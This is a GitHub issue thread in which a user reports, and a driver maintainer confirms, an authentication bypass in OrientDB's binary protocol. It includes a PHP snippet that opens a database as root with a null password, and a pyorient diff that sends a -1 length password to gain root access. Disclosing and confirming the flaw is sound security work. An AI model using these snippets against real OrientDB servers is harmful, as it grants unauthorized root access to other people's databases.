### ISSUE TITLE
security issue in binary protocol

### ISSUE THREAD

**Issue by micha-nerdlichter** [orientechnologies/PhpOrient#9]
As stated in https://github.com/orientechnologies/orientdb/issues/4191 when I use dbOpen with password `null`
```php
require 'PhpOrient/vendor/autoload.php';
use PhpOrient\PhpOrient;
$client = new PhpOrient( 'localhost', 2424 );
$client->dbOpen('GratefulDeadConcerts', 'root', null);
```
I get root acces to the db without knowing the real password. @Ostico can you confirm this? I tried with OrientDB 2.0.8/2.1-rc2. and PhpOrient v1.1.8

**Comment by Ostico** [comment]
Hi @micha-nerdlichter ,

yes i can confirm, you're right. I tried also with my other driver pyorient ( hacking it a little bit ):
```diff
diff --git a/pyorient/messages/base.py b/pyorient/messages/base.py
index e56273a..e8b9c10 100644
--- a/pyorient/messages/base.py
+++ b/pyorient/messages/base.py
@@ -282,7 +282,10 @@ class BaseMessage(object):
             if sys.version_info[0] >= 3:
                 if isinstance( v, str ):
                     v = v.encode('utf-8')
-            _content = struct.pack("!i", len(v)) + v
+            if v == b'':
+                _content = struct.pack("!i", -1)
+            else:
+                _content = struct.pack("!i", len(v)) + v
         elif t['type'] == STRINGS:
```

Sending an empty string of length of -1 as root password, i can gain the access and root privileges.

**Comment by micha-nerdlichter** [comment]
continuing on https://github.com/orientechnologies/orientdb/issues/4191
